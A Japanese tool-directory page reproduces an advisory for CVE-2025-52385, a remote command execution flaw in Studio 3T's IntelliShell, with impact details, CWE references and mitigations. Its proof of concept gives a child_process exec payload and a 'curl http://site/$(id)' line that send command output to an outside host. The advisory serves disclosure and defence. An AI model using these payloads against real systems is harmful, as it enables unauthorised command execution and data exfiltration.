Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-52385 — Studio 3T v.2025.1.0 | Kitploit
ツール/GitHubGitHub/kov404/cve-2025-52385
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubkov404/cve-2025-52385

CVE-2025-52385

Studio 3T v.2025.1.0

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-52385

ソフトウェア: Studio 3T v.2025.1.0

脆弱性レポート: Studio 3T リモートコマンド実行

概要 Studio 3T バージョン 2025.1.0 以前の重大な脆弱性により、リモートの攻撃者は IntelliShell コンポーネントの child_process モジュールを悪用した細工されたペイロードを介して任意のコードを実行できます。

詳細 脆弱性タイプ: リモートコマンド実行 影響を受ける製品: Studio 3T、バージョン <= 2025.1.0 影響を受けるコンポーネント: IntelliShell 攻撃タイプ: リモート 影響: コード実行: あり サービス拒否: あり 権限昇格: あり

説明 この脆弱性により、リモートの攻撃者は child_process モジュールを利用して、IntelliShell 経由で悪意のある JavaScript ペイロードを送信することで、任意のオペレーティングシステムコマンドを実行できます。これはブラインド実行の脆弱性であり、攻撃者に直接の出力は返されません。 攻撃ベクター

MongoDB インスタンスへの接続を確立します。 child_process モジュールを利用して任意のオペレーティングシステムコマンドを実行する、悪意のある JavaScript ペイロードを IntelliShell 経由で送信します。

概念実証(PoC) 脆弱性を検証するには、次の手順を使用します:

ローカル HTTP サーバーをセットアップします:python3 -m http.server 80

IntelliShell で次の JavaScript ペイロードを実行します: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));

あるいは、以下のコマンドを検証ベクターとして使用します:curl http://site/$(id) 参照

Studio 3T 公式ウェブサイト

Studio 3T GitHub リポジトリ

CWE-78: OSコマンドインジェクション

CWE-94: コードインジェクション

軽減策 ユーザー: パッチ適用済みの Studio 3T バージョン(利用可能な場合)にアップグレードするか、信頼できない MongoDB 接続での IntelliShell の使用を避けてください。 ベンダー: IntelliShell の child_process モジュールへの入力を制限またはサニタイズして、不正なコマンド実行を防止してください。

謝辞 この脆弱性は Kaio Mendonca Pereira によって発見され、報告されました。

ツールをダウンロード